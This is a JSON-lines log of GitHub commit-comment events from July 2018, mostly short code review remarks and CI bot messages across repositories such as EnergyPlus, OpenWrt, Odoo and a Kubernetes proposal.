{"id":"7960223525","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29695268,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-13T06:09:46Z","updated_at":"2018-07-13T06:09:46Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-13T06:09:46Z"}
{"id":"7960225261","type":"CommitCommentEvent","actor":{"login":"rawrmaan"},"repo":{"name":"jamiebuilds/jamie.build"},"payload":{"comment":{"id":29695272,"position":null,"line":null,"path":null,"commit_id":"b66f185df4c2fb25d7da08ba2529eaff5ec16603","created_at":"2018-07-13T06:10:20Z","updated_at":"2018-07-13T06:10:20Z","author_association":"NONE","body":"Fair enough. I'm genuinely curious why you find HN toxic? To me it is one of the least toxic communities I have found online."}},"created_at":"2018-07-13T06:10:20Z"}
{"id":"7960225707","type":"CommitCommentEvent","actor":{"login":"jammmet"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29695273,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-13T06:10:29Z","updated_at":"2018-07-13T06:10:29Z","author_association":"NONE","body":"OpenWRT commit `16035a7` Packages `2794a18 `\r\n[config.txt](https://github.com/openwrt/packages/files/2191476/config.txt)\r\n\r\nNote I am building a manually added `mysql` package (as I can't use `mariadb` due to size constraints)"}},"created_at":"2018-07-13T06:10:29Z"}
{"id":"7960229296","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695277,"position":8,"line":8,"path":"login.php","commit_id":"8a0e49f2156f2cd7255831efe5a47a4ab85bfebd","created_at":"2018-07-13T06:11:41Z","updated_at":"2018-07-13T06:11:41Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\nログイン処理を行う際には、「WHERE句」でユーザのDB検索を行い、データを取得する方法が推奨される。\r\n上記の全データを取得して、ループを回す方法では時間がかかりすぎるため。"}},"created_at":"2018-07-13T06:11:41Z"}
{"id":"7960229557","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"Cxbx-Reloaded/Cxbx-Reloaded"},"payload":{"comment":{"id":29695278,"position":null,"line":null,"path":null,"commit_id":"97cf31961b7fb258de41eeb4801ba284c2c1ff7d","created_at":"2018-07-13T06:11:47Z","updated_at":"2018-07-13T06:11:47Z","author_association":"MEMBER","body":"Did you intentionally skip restoring HalSystemInterrupt::Trigger() or is that an oversight?"}},"created_at":"2018-07-13T06:11:47Z"}
{"id":"7960231475","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695283,"position":43,"line":43,"path":"login.php","commit_id":"8a0e49f2156f2cd7255831efe5a47a4ab85bfebd","created_at":"2018-07-13T06:12:26Z","updated_at":"2018-07-13T06:12:26Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n上記はおそらく、不要である記載のはずなので、削除する。\r\nごみコードは残しておくと、忘れて消さなくなるので、早めに消すことを心掛ける"}},"created_at":"2018-07-13T06:12:26Z"}
{"id":"7960232961","type":"CommitCommentEvent","actor":{"login":"manveru"},"repo":{"name":"ivanbrennan/fakeproject"},"payload":{"comment":{"id":29695285,"position":28,"line":28,"path":"shell.nix","commit_id":"e8f525226303dc563610af3d7f5a258c636e4f2a","created_at":"2018-07-13T06:12:57Z","updated_at":"2018-07-13T06:12:57Z","author_association":"NONE","body":"Sorry, I probably shouldn't write when I'm dead tired still :)\r\nIt's `rubyenv.wrappedRuby` instead."}},"created_at":"2018-07-13T06:12:57Z"}
{"id":"7960235970","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695290,"position":15,"line":15,"path":"login.html","commit_id":"b21988b242db6bdb84d12f88dc5e97e6cb25d7e9","created_at":"2018-07-13T06:13:58Z","updated_at":"2018-07-13T06:13:58Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n当HTMLはどこにも呼び出しされていない不要なファイルだと思うので早めに削除する"}},"created_at":"2018-07-13T06:13:58Z"}
{"id":"7960237927","type":"CommitCommentEvent","actor":{"login":"PD0DIB"},"repo":{"name":"PD0DIB/Nextion_HAM-radio-screens"},"payload":{"comment":{"id":29695293,"position":null,"line":null,"path":null,"commit_id":"aa8d7a7789d5a1d87d27f723a5bbb630c7869d0a","created_at":"2018-07-13T06:14:38Z","updated_at":"2018-07-13T06:14:38Z","author_association":"OWNER","body":"5\"SIMPLEX: spot in antenna area removed"}},"created_at":"2018-07-13T06:14:38Z"}
{"id":"7960239565","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29695298,"position":4,"line":642,"path":"addons/mail/static/src/js/discuss.js","commit_id":"6ff62c89ae7cd6f001f2905aa45bfe90c49c244c","created_at":"2018-07-13T06:15:12Z","updated_at":"2018-07-13T06:15:12Z","author_association":"NONE","body":"Should be true by default."}},"created_at":"2018-07-13T06:15:12Z"}
{"id":"7960240360","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29695301,"position":4,"line":66,"path":"addons/sale_timesheet/static/src/js/timesheet_plan.js","commit_id":"6ff62c89ae7cd6f001f2905aa45bfe90c49c244c","created_at":"2018-07-13T06:15:27Z","updated_at":"2018-07-13T06:15:27Z","author_association":"NONE","body":"should be true by default."}},"created_at":"2018-07-13T06:15:27Z"}
{"id":"7960240596","type":"CommitCommentEvent","actor":{"login":"jiayingz"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695302,"position":133,"line":92,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:15:32Z","updated_at":"2018-07-13T06:15:32Z","author_association":"OWNER","body":"For resource quota, that is because the current quota admission handler is very simple. It basically just watches for Pod updates and does simple resource request counting to see whether it resource requests in a given namespace is beyond any specified limit. If we add resource property selector directly in ContainerSpec, we will need to extend the current resource quota spec and the quota admission handler quite a lot. It is also quite tricky to make sure all pod resource requests are properly quota controlled with the multiple matching behavior allowed by the use of resource property selectors."}},"created_at":"2018-07-13T06:15:32Z"}
{"id":"7960241365","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695303,"position":39,"line":49,"path":"login.php","commit_id":"29f59fa7776a17f6d07c174b539e4f9df71694e9","created_at":"2018-07-13T06:15:47Z","updated_at":"2018-07-13T06:15:47Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\nインデントがずれていたのもそうだが、ブロックかっこの閉じるかっこ「)」や「}」の後には何の処理が終了したかをコメントにて記述する方がよいと思われる。\r\n"}},"created_at":"2018-07-13T06:15:47Z"}
{"id":"7960241954","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29695305,"position":4,"line":349,"path":"addons/web/static/src/js/views/search/search_view.js","commit_id":"6ff62c89ae7cd6f001f2905aa45bfe90c49c244c","created_at":"2018-07-13T06:15:58Z","updated_at":"2018-07-13T06:15:58Z","author_association":"NONE","body":"true?"}},"created_at":"2018-07-13T06:15:58Z"}
{"id":"7960243166","type":"CommitCommentEvent","actor":{"login":"d00rman"},"repo":{"name":"wikimedia/restbase"},"payload":{"comment":{"id":29695307,"position":null,"line":null,"path":null,"commit_id":"f33bfc3451800de86b75b6b95e573db6eca595a0","created_at":"2018-07-13T06:16:20Z","updated_at":"2018-07-13T06:16:20Z","author_association":"CONTRIBUTOR","body":"The [monitoring tests section](https://github.com/wikimedia/restbase/blob/master/test/features/specification/monitoring.js) exercises them on every `npm test` run: it reads the spec for enwiki, wm.org and enwiktionary and executes the associated `x-amples`."}},"created_at":"2018-07-13T06:16:20Z"}
{"id":"7960243300","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29695308,"position":null,"line":null,"path":null,"commit_id":"585220a9208792811a884f719ba08dba855a112a","created_at":"2018-07-13T06:16:23Z","updated_at":"2018-07-13T06:16:23Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-4](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-13T06:16:23Z"}
{"id":"7960250200","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695324,"position":null,"line":null,"path":null,"commit_id":"29f59fa7776a17f6d07c174b539e4f9df71694e9","created_at":"2018-07-13T06:18:34Z","updated_at":"2018-07-13T06:18:34Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\nJSのscriptタグの記載は、<html>タグの終わりではなく<head></head>の間に書くのが一般的。\r\nまた、ajax処理については本来、外部関数にして汎用性を考えた方がよいと思われる。"}},"created_at":"2018-07-13T06:18:34Z"}
{"id":"7960250653","type":"CommitCommentEvent","actor":{"login":"RadWolfie"},"repo":{"name":"Cxbx-Reloaded/Cxbx-Reloaded"},"payload":{"comment":{"id":29695327,"position":null,"line":null,"path":null,"commit_id":"97cf31961b7fb258de41eeb4801ba284c2c1ff7d","created_at":"2018-07-13T06:18:42Z","updated_at":"2018-07-13T06:18:42Z","author_association":"MEMBER","body":"Definitely oversight, I was focusing on .cpp files and attempt to find any more USE_SEH keyword in visual studio's search functionality. It came back no result after removing the ones I found in my pull request I sent you."}},"created_at":"2018-07-13T06:18:42Z"}
{"id":"7960255839","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695337,"position":100,"line":63,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:20:22Z","updated_at":"2018-07-13T06:20:22Z","author_association":"NONE","body":"s/ not necessarily from the same vendor/ not necessarily from the different vendor?\r\n\r\nor\r\n(may be from same vendor) . I think this was the case Henry mentioned. same vendor"}},"created_at":"2018-07-13T06:20:22Z"}
{"id":"7960258743","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695340,"position":43,"line":43,"path":"login.php","commit_id":"8a0e49f2156f2cd7255831efe5a47a4ab85bfebd","created_at":"2018-07-13T06:21:19Z","updated_at":"2018-07-13T06:21:19Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\nすみません、上記の指摘は不適切であると思われるので気にしないでください。\r\n（上記のhtmlは必要であると思われるため）"}},"created_at":"2018-07-13T06:21:19Z"}
{"id":"7960264596","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695357,"position":114,"line":76,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:23:10Z","updated_at":"2018-07-13T06:23:10Z","author_association":"NONE","body":"can we include kad/bart0sh's FPGA use case as well or not needed?"}},"created_at":"2018-07-13T06:23:10Z"}
{"id":"7960283601","type":"CommitCommentEvent","actor":{"login":"vknaisl"},"repo":{"name":"DataStewardshipWizard/dsw-server"},"payload":{"comment":{"id":29695384,"position":13,"line":13,"path":"lib/Service/DataManagementPlan/Templates/Settings.hs","commit_id":"ecad5486cc4019df91b111264a98ffe4f329cd76","created_at":"2018-07-13T06:29:04Z","updated_at":"2018-07-13T06:29:04Z","author_association":"COLLABORATOR","body":"I understand that currently it's a prototype but in future it should load from some config file like `template-variables.cfg`"}},"created_at":"2018-07-13T06:29:04Z"}
{"id":"7960286969","type":"CommitCommentEvent","actor":{"login":"vknaisl"},"repo":{"name":"DataStewardshipWizard/dsw-server"},"payload":{"comment":{"id":29695391,"position":29,"line":34,"path":"lib/Service/DataManagementPlan/Templates/Html.hs","commit_id":"ecad5486cc4019df91b111264a98ffe4f329cd76","created_at":"2018-07-13T06:30:05Z","updated_at":"2018-07-13T06:30:05Z","author_association":"COLLABORATOR","body":"Why you replace to `http` and then to `https`?"}},"created_at":"2018-07-13T06:30:05Z"}
{"id":"7960288208","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695395,"position":31,"line":31,"path":"login.php","commit_id":"8a0e49f2156f2cd7255831efe5a47a4ab85bfebd","created_at":"2018-07-13T06:30:27Z","updated_at":"2018-07-13T06:30:27Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n存在しないファイルがインクルードされている。不要なファイルはインクルードすると、コンソールエラーとなり、読み込みが遅くなってしまうので、注意する"}},"created_at":"2018-07-13T06:30:27Z"}
{"id":"7960288591","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695396,"position":26,"line":122,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"d9ac208f6aea69a6f2a4b4f0092ee91f1857fe50","created_at":"2018-07-13T06:30:33Z","updated_at":"2018-07-13T06:30:33Z","author_association":"COLLABORATOR","body":"retry할때는 토스트가 발생하면 안됩니다.\r\ncount를 생성자로 받지 않고 처리하는 방법을 고민해보세요"}},"created_at":"2018-07-13T06:30:33Z"}
{"id":"7960293529","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695409,"position":23,"line":120,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"d9ac208f6aea69a6f2a4b4f0092ee91f1857fe50","created_at":"2018-07-13T06:32:03Z","updated_at":"2018-07-13T06:32:03Z","author_association":"COLLABORATOR","body":"retry count도 별도의 상수로 정의하시죠"}},"created_at":"2018-07-13T06:32:03Z"}
{"id":"7960293636","type":"CommitCommentEvent","actor":{"login":"joshuous"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":29695410,"position":null,"line":null,"path":null,"commit_id":"491265308fc744c777c87b61ea9d682f6e348b75","created_at":"2018-07-13T06:32:06Z","updated_at":"2018-07-13T06:32:06Z","author_association":"OWNER","body":"It does not change the load avg. It just ignores RT load when checking whether the system is overutilized"}},"created_at":"2018-07-13T06:32:06Z"}
{"id":"7960303753","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29695429,"position":null,"line":null,"path":null,"commit_id":"71ff1cd19370965beec4da2dfd8b3b6fa689f94b","created_at":"2018-07-13T06:35:13Z","updated_at":"2018-07-13T06:35:13Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-8](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-8).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-8-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-13T06:35:13Z"}
{"id":"7960306037","type":"CommitCommentEvent","actor":{"login":"997609140"},"repo":{"name":"508154277/h5-start"},"payload":{"comment":{"id":29695434,"position":45,"line":45,"path":"css/css11.css","commit_id":"1e80439c40b892f7794bc75ed5c53d98da31d728","created_at":"2018-07-13T06:35:53Z","updated_at":"2018-07-13T06:35:53Z","author_association":"COLLABORATOR","body":"color:blue;"}},"created_at":"2018-07-13T06:35:53Z"}
{"id":"7960306680","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29695437,"position":null,"line":null,"path":null,"commit_id":"a3bca4db83f26d83550bbca8e72bc87d86ca625b","created_at":"2018-07-13T06:36:05Z","updated_at":"2018-07-13T06:36:05Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-9](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-9-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-13T06:36:05Z"}
{"id":"7960306738","type":"CommitCommentEvent","actor":{"login":"theaoneone"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29695439,"position":null,"line":null,"path":null,"commit_id":"92f1f60c1508f4c091293c0aad03f773a2ab3662","created_at":"2018-07-13T06:36:06Z","updated_at":"2018-07-13T06:36:06Z","author_association":"NONE","body":"line 282 needs to change"}},"created_at":"2018-07-13T06:36:06Z"}
{"id":"7960307465","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695443,"position":26,"line":122,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"d9ac208f6aea69a6f2a4b4f0092ee91f1857fe50","created_at":"2018-07-13T06:36:20Z","updated_at":"2018-07-13T06:36:20Z","author_association":"COLLABORATOR","body":"아닙니다. 이건 이정도로 마무리 짓겠습니다.\r\nretry할때는 토스트가 발생하지 않고, 100번 retry후 실패시 토스트 발생하게끔만 고쳐주세요~"}},"created_at":"2018-07-13T06:36:20Z"}
{"id":"7960309854","type":"CommitCommentEvent","actor":{"login":"jiayingz"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695450,"position":114,"line":76,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:37:06Z","updated_at":"2018-07-13T06:37:06Z","author_association":"OWNER","body":"I still don't fully understand their FPGA use case yet, but if you think they may benefit similarly in their use case, please feel free to add it."}},"created_at":"2018-07-13T06:37:06Z"}
{"id":"7960312881","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695456,"position":133,"line":92,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:38:04Z","updated_at":"2018-07-13T06:38:04Z","author_association":"NONE","body":"+1 for both and may be it will help the difference between the approaches to others as well if we add these details. "}},"created_at":"2018-07-13T06:38:04Z"}
{"id":"7960315377","type":"CommitCommentEvent","actor":{"login":"jiayingz"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695459,"position":133,"line":92,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:38:49Z","updated_at":"2018-07-13T06:38:49Z","author_association":"OWNER","body":"that is also my hope :)"}},"created_at":"2018-07-13T06:38:49Z"}
{"id":"7960315774","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29695461,"position":null,"line":null,"path":null,"commit_id":"0e072464927cd386a88f2a556f5c14103dac9e75","created_at":"2018-07-13T06:38:56Z","updated_at":"2018-07-13T06:38:56Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/0e072464927cd386a88f2a556f5c14103dac9e75#commitcomment-29694349) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/24e09c15b7236c70244fc9e36545831b1a0adfe5/daily_2018_7_13/report.md). cc @ararslan"}},"created_at":"2018-07-13T06:38:56Z"}
{"id":"7960316558","type":"CommitCommentEvent","actor":{"login":"micmac1"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29695462,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-13T06:39:11Z","updated_at":"2018-07-13T06:39:11Z","author_association":"CONTRIBUTOR","body":"Am July 13, 2018 6:10:40 AM UTC schrieb Jamie <notifications@github.com>:\n>OpenWRT commit `16035a7` Packages `2794a18 `\n>[config.txt](https://github.com/openwrt/packages/files/2191476/config.txt)\n>\n>Note I am building a manually added `mysql` package (as I can't use\n>`mariadb` due to size constraints)\n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/openwrt/packages/commit/f6e06384f1c5aca396ec65a70ec94837f1c133a8#commitcomment-29695273\n\nMySQL/MariaDB is not a depend of php7 anymore. Instead the mysqlnd plugin is used. Just FYI. :-)"}},"created_at":"2018-07-13T06:39:11Z"}
{"id":"7960317133","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29695464,"position":13,"line":11,"path":"src/main/java/com/example/basic/VO/BVO.java","commit_id":"6585fcb5198b697a3cebf04a1ce90abe2dedaec5","created_at":"2018-07-13T06:39:21Z","updated_at":"2018-07-13T06:39:21Z","author_association":"NONE","body":"regDate"}},"created_at":"2018-07-13T06:39:21Z"}
{"id":"7960318741","type":"CommitCommentEvent","actor":{"login":"thuang"},"repo":{"name":"InterPSS-Project/ipss-plugin"},"payload":{"comment":{"id":29695467,"position":14,"line":462,"path":"ipss.plugin.multiNet/src/org/ipss/multiNet/algo/SubNetworkProcessor.java","commit_id":"c8bfd9ed23c59d9e64f34bf4414c4cd7b68e9ce8","created_at":"2018-07-13T06:39:51Z","updated_at":"2018-07-13T06:39:51Z","author_association":"CONTRIBUTOR","body":"line # 479, this.subNet.addBus(source) shows a compile error. @jinjingfarm "}},"created_at":"2018-07-13T06:39:51Z"}
{"id":"7960320629","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29695471,"position":16,"line":18,"path":"src/main/java/com/example/basic/controller/HomeController.java","commit_id":"a21d87d787d7d0119ec333a9bce190bcbb46c32d","created_at":"2018-07-13T06:40:26Z","updated_at":"2018-07-13T06:40:26Z","author_association":"NONE","body":"주석은 지워주세용"}},"created_at":"2018-07-13T06:40:26Z"}
{"id":"7960321319","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29695472,"position":20,"line":21,"path":"src/main/java/com/example/basic/controller/HomeController.java","commit_id":"a21d87d787d7d0119ec333a9bce190bcbb46c32d","created_at":"2018-07-13T06:40:38Z","updated_at":"2018-07-13T06:40:38Z","author_association":"NONE","body":"new보단\r\n```java\r\n@Autowired\r\n```"}},"created_at":"2018-07-13T06:40:38Z"}
{"id":"7960323073","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29695473,"position":29,"line":36,"path":"src/main/java/com/example/basic/controller/HomeController.java","commit_id":"a21d87d787d7d0119ec333a9bce190bcbb46c32d","created_at":"2018-07-13T06:41:09Z","updated_at":"2018-07-13T06:41:09Z","author_association":"NONE","body":"service를 거쳐서 db로 접근하는 경우에는 , Service에서는 좀 더 네이밍을 고려해볼 필요가 있겠네요"}},"created_at":"2018-07-13T06:41:09Z"}
{"id":"7960325927","type":"CommitCommentEvent","actor":{"login":"brandoconnor"},"repo":{"name":"terraform-aws-modules/terraform-aws-eks"},"payload":{"comment":{"id":29695478,"position":5,"line":67,"path":"main.tf","commit_id":"bc848058a75292e62aaad9b2470372320fd3dd79","created_at":"2018-07-13T06:41:58Z","updated_at":"2018-07-13T06:41:58Z","author_association":"MEMBER","body":"It leaves 2 newlines at the end of the README.md file which is not quite right. Everyone but Windows users (and even those who have WSL) can run this command. It's a one-liner. Meh."}},"created_at":"2018-07-13T06:41:58Z"}
{"id":"7960328652","type":"CommitCommentEvent","actor":{"login":"tofutim"},"repo":{"name":"rejectedpromise/PIVX"},"payload":{"comment":{"id":29695484,"position":null,"line":null,"path":null,"commit_id":"28ab740f239995434adbd382aa46711820651db4","created_at":"2018-07-13T06:42:48Z","updated_at":"2018-07-13T06:42:48Z","author_association":"NONE","body":"black magic!"}},"created_at":"2018-07-13T06:42:48Z"}
{"id":"7960329587","type":"CommitCommentEvent","actor":{"login":"micmac1"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29695485,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-13T06:43:04Z","updated_at":"2018-07-13T06:43:04Z","author_association":"CONTRIBUTOR","body":"The library I mean.\n"}},"created_at":"2018-07-13T06:43:04Z"}
{"id":"7960331159","type":"CommitCommentEvent","actor":{"login":"solenchey"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29695487,"position":null,"line":null,"path":null,"commit_id":"2d9fe7ae72fb998421e372f735f6b3bdd851206a","created_at":"2018-07-13T06:43:32Z","updated_at":"2018-07-13T06:43:32Z","author_association":"NONE","body":"Readme-edits"}},"created_at":"2018-07-13T06:43:32Z"}
{"id":"7960331734","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29695489,"position":13,"line":13,"path":"rest_api/tests/api_test/base.py","commit_id":"4088df9911ff12a6b0bd3e610ba4477e6fba08e1","created_at":"2018-07-13T06:43:43Z","updated_at":"2018-07-13T06:43:43Z","author_association":"COLLABORATOR","body":"these four tests can be clubbed into one test case right"}},"created_at":"2018-07-13T06:43:43Z"}
{"id":"7960332496","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"subinyoon/RB_homepage_coding"},"payload":{"comment":{"id":29695490,"position":14,"line":370,"path":"js/main_m.js","commit_id":"d7d782c5cac9bcf3ae0cb6659ccd52ac3ff47016","created_at":"2018-07-13T06:43:57Z","updated_at":"2018-07-13T06:43:57Z","author_association":"COLLABORATOR","body":"```javascript\r\n$(\".footer .sns_wrap .sns_1\").on('click', openBehance);\r\n$(\".footer .sns_wrap .sns_2\").on('click', openBehance);\r\n$(\".footer .sns_wrap .sns_3\").on('click', openBehance);\r\nfunction openBehance() {\r\n    window.open('https://www.behance.net/red_brick','_blank');    \r\n}\r\n```"}},"created_at":"2018-07-13T06:43:57Z"}
{"id":"7960334272","type":"CommitCommentEvent","actor":{"login":"ganuybhat"},"repo":{"name":"moby/moby"},"payload":{"comment":{"id":29695494,"position":5,"line":46,"path":"contrib/mkimage-alpine.sh","commit_id":"2137e866b98d29f6a96df8a61c49f25a3ea2cb0d","created_at":"2018-07-13T06:44:29Z","updated_at":"2018-07-13T06:44:29Z","author_association":"NONE","body":"How does it work!"}},"created_at":"2018-07-13T06:44:29Z"}
{"id":"7960335242","type":"CommitCommentEvent","actor":{"login":"solenchey"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29695497,"position":null,"line":null,"path":null,"commit_id":"95b136ce0398dd75d329d50ab60904f79492b1a2","created_at":"2018-07-13T06:44:46Z","updated_at":"2018-07-13T06:44:46Z","author_association":"NONE","body":"Readme-edits"}},"created_at":"2018-07-13T06:44:46Z"}
{"id":"7960337318","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29695504,"position":96,"line":96,"path":"rest_api/tests/api_test/base.py","commit_id":"4088df9911ff12a6b0bd3e610ba4477e6fba08e1","created_at":"2018-07-13T06:45:24Z","updated_at":"2018-07-13T06:45:24Z","author_association":"COLLABORATOR","body":"lot of asserts in this test , not sure what is being tested here"}},"created_at":"2018-07-13T06:45:24Z"}
{"id":"7960338579","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695506,"position":114,"line":76,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:45:47Z","updated_at":"2018-07-13T06:45:47Z","author_association":"NONE","body":"cool"}},"created_at":"2018-07-13T06:45:47Z"}
